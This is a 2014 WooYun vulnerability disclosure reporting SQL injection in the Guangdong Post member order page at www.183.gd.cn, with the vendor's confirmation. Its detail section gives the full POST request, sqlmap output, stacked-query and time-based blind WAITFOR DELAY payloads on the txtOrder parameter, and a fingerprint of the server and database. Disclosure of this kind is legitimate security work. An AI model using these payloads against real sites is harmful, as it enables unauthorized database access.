当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074199

漏洞标题:广东省邮政公司SQL注入

相关厂商:http://www.183.gd.cn/

漏洞作者: 小饼仔

提交时间:2014-08-28 17:14

修复时间:2014-10-12 17:16

公开时间:2014-10-12 17:16

漏洞类型:SQL注入

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-28: 细节已通知厂商并且等待厂商处理中
2014-08-29: 厂商已经确认,细节仅向厂商公开
2014-09-08: 细节向核心白帽子及相关领域专家公开
2014-09-18: 细节向普通白帽子公开
2014-09-28: 细节向实习白帽子公开
2014-10-12: 细节向公众公开

简要描述:

~~~

详细说明:

POST请求

POST /Member/MyOrder.aspx HTTP/1.1
Host: www.183.gd.cn
Proxy-Connection: keep-alive
Content-Length: 897
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.183.gd.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.183.gd.cn/Member/MyOrder.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: ASP.NET_SessionId=mevwmp55ggdjsfqabfoylvmn; CNZZDATA2278430=cnzz_eid%3D1100403919-1409196452-http%253A%252F%252Fwww.gdpost.com.cn%252F%26ntime%3D1409196452; PostWeb183=LoginName=li; ASPSESSIONIDQARRBSDD=EIIHPCBDMKFPEJJAGCNIGOAP; CNZZDATA2278111=cnzz_eid%3D1957482220-1409196478-http%253A%252F%252Fwww.183.gd.cn%252F%26ntime%3D1409196478
__VIEWSTATE=dDwxOTUxODc0ODExO3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDE%2BO2k8NT47aTw2PjtpPDE0PjtpPDE1Pjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8MD47aTwyPjs%2BO2w8dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PHA8cDxsPFRleHQ7PjtsPOasoui%2FjuaCqO%2B8jOaCqOeahOS8muWRmOe6p%2BWIq%2BS4ujog5LiA6Iis5Lya5ZGYITs%2BPjs%2BOzs%2BOz4%2BOz4%2BOz4%2BOz4%2BOz4%2BO3Q8QDA8cDxwPGw8XyFEYXRhU291cmNlSXRlbUNvdW50O18hSXRlbUNvdW50O1BhZ2VDb3VudDtEYXRhS2V5czs%2BO2w8aTwtMT47aTwtMT47aTwwPjtsPD47Pj47Pjs7Ozs7Ozs7Ozs%2BOzs%2BO3Q8cDxwPGw8VGV4dDtWaXNpYmxlOz47bDzlj4vmg4Xmj5DnpLrvvJrmgqjmmoLml7bov5jmsqHmnInlho3mrKHmlK%2Fku5jorqLljZXvvIE7bzx0Pjs%2BPjs%2BOzs%2BO3Q8QDA8Ozs7Ozs7Ozs7Oz47Oz47dDxwPHA8bDxUZXh0O1Zpc2libGU7PjtsPOWPi%2BaDheaPkOekuu%2B8muaCqOaaguaXtui%2FmOayoeacieiuouWNle%2B8gTtvPHQ%2BOz4%2BOz47Oz47Pj47Pj47PstSsKsQgtOOG9rNWzluFgfQejIa&txtOrder=123&btnSearch=%CB%D1+%CB%F7


sqlmap:

Place: POST
Parameter: txtOrder
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=dDwxOTUxODc0ODExO3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDE+O2k8NT47aTw2PjtpPDE0PjtpPDE1Pjs+O2w8dDw7bDxpPDA+Oz47bDx0PDtsPGk8MD47aTwyPjs+O2w8dDxwPGw8VmlzaWJsZTs+O2w8bzxmPjs+Pjs7Pjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPFRleHQ7PjtsPOasoui/juaCqO+8jOaCqOeahOS8muWRmOe6p+WIq+S4ujog5LiA6Iis5Lya5ZGYITs+Pjs+Ozs+Oz4+Oz4+Oz4+Oz4+Oz4+O3Q8QDA8cDxwPGw8XyFEYXRhU291cmNlSXRlbUNvdW50O18hSXRlbUNvdW50O1BhZ2VDb3VudDtEYXRhS2V5czs+O2w8aTwtMT47aTwtMT47aTwwPjtsPD47Pj47Pjs7Ozs7Ozs7Ozs+Ozs+O3Q8cDxwPGw8VGV4dDtWaXNpYmxlOz47bDzlj4vmg4Xmj5DnpLrvvJrmgqjmmoLml7bov5jmsqHmnInlho3mrKHmlK/ku5jorqLljZXvvIE7bzx0Pjs+Pjs+Ozs+O3Q8QDA8Ozs7Ozs7Ozs7Oz47Oz47dDxwPHA8bDxUZXh0O1Zpc2libGU7PjtsPOWPi+aDheaPkOekuu+8muaCqOaaguaXtui/mOayoeacieiuouWNle+8gTtvPHQ+Oz4+Oz47Oz47Pj47Pj47PstSsKsQgtOOG9rNWzluFgfQejIa&txtOrder='; WAITFOR DELAY '0:0:5'--&btnSearch=%CB%D1 %CB%F7
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=dDwxOTUxODc0ODExO3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDE+O2k8NT47aTw2PjtpPDE0PjtpPDE1Pjs+O2w8dDw7bDxpPDA+Oz47bDx0PDtsPGk8MD47aTwyPjs+O2w8dDxwPGw8VmlzaWJsZTs+O2w8bzxmPjs+Pjs7Pjt0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPFRleHQ7PjtsPOasoui/juaCqO+8jOaCqOeahOS8muWRmOe6p+WIq+S4ujog5LiA6Iis5Lya5ZGYITs+Pjs+Ozs+Oz4+Oz4+Oz4+Oz4+Oz4+O3Q8QDA8cDxwPGw8XyFEYXRhU291cmNlSXRlbUNvdW50O18hSXRlbUNvdW50O1BhZ2VDb3VudDtEYXRhS2V5czs+O2w8aTwtMT47aTwtMT47aTwwPjtsPD47Pj47Pjs7Ozs7Ozs7Ozs+Ozs+O3Q8cDxwPGw8VGV4dDtWaXNpYmxlOz47bDzlj4vmg4Xmj5DnpLrvvJrmgqjmmoLml7bov5jmsqHmnInlho3mrKHmlK/ku5jorqLljZXvvIE7bzx0Pjs+Pjs+Ozs+O3Q8QDA8Ozs7Ozs7Ozs7Oz47Oz47dDxwPHA8bDxUZXh0O1Zpc2libGU7PjtsPOWPi+aDheaPkOekuu+8muaCqOaaguaXtui/mOayoeacieiuouWNle+8gTtvPHQ+Oz4+Oz47Oz47Pj47Pj47PstSsKsQgtOOG9rNWzluFgfQejIa&txtOrder=' WAITFOR DELAY '0:0:5'--&btnSearch=%CB%D1 %CB%F7
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005


web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
current user is DBA: False
available databases [1]:
[*] 183dbnew

漏洞证明:

修复方案:

不知道

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-08-29 11:00

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现,典型的SQL注射漏洞。
影响的数据:中
攻击成本:中
造成影响:中
综合评级为:中,rank:8
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论